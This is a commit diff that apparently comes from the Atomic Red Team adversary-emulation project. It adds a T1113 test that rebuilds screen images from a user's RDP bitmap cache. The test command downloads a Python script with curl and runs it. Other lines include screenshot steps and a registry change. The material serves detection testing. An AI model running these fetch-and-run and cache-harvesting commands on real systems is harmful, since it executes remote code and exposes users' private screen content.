security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1113 to add a RDP Bitmap Cache Extraction test (#3256)

Browse Source 
Co-authored-by: Hare Sudhan <code@0x6c.dev>
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
This commit is contained in:
Vladan Sekulic
2026-01-06 12:46:38 +01:00
committed by GitHub
parent f4a93ac212
commit a5d2c7f122
1 changed files with 41 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1113/T1113.yaml
+41 -2
View File
@@ -96,7 +96,6 @@ atomic_tests:
cleanup_command: | cleanup_command: |
rm #{output_file} rm #{output_file}
name: sh name: sh
- name: Capture Linux Desktop using Import Tool - name: Capture Linux Desktop using Import Tool
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
description: | description: |
@@ -174,7 +173,6 @@ atomic_tests:
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
description: | description: |
Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
supported_platforms: supported_platforms:
- windows - windows
@@ -210,3 +208,44 @@ atomic_tests:
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
name: powershell name: powershell
elevation_required: true elevation_required: true
- name: RDP Bitmap Cache Extraction via bmc-tools
description: |
Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
supported_platforms:
- windows
input_arguments:
cache_path:
description: Path to the RDP Cache directory or specific .bmc file
type: path
default: $env:LOCALAPPDATA\Microsoft\Terminal Server Client\Cache
output_dir:
description: Directory to save reconstructed images
type: path
default: $env:TEMP\rdp_screens
dependency_executor_name: powershell
dependencies:
- description: |
Python must be installed and in the PATH to run bmc-tools.py
prereq_command: |
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "Please install Python manually."
executor:
name: powershell
elevation_required: false
command: |
$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'
$toolsDir = "$env:TEMP\bmc-tools.py"
# create output directory
New-Item -ItemType Directory -Path #{output_dir} -Force | Out-Null
# python script download
& curl.exe -L $url --output $toolsDir
# execution step
if (Test-Path $toolsDir) { python $toolsDir -s "#{cache_path}" -d #{output_dir} -b }
cleanup_command: |
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue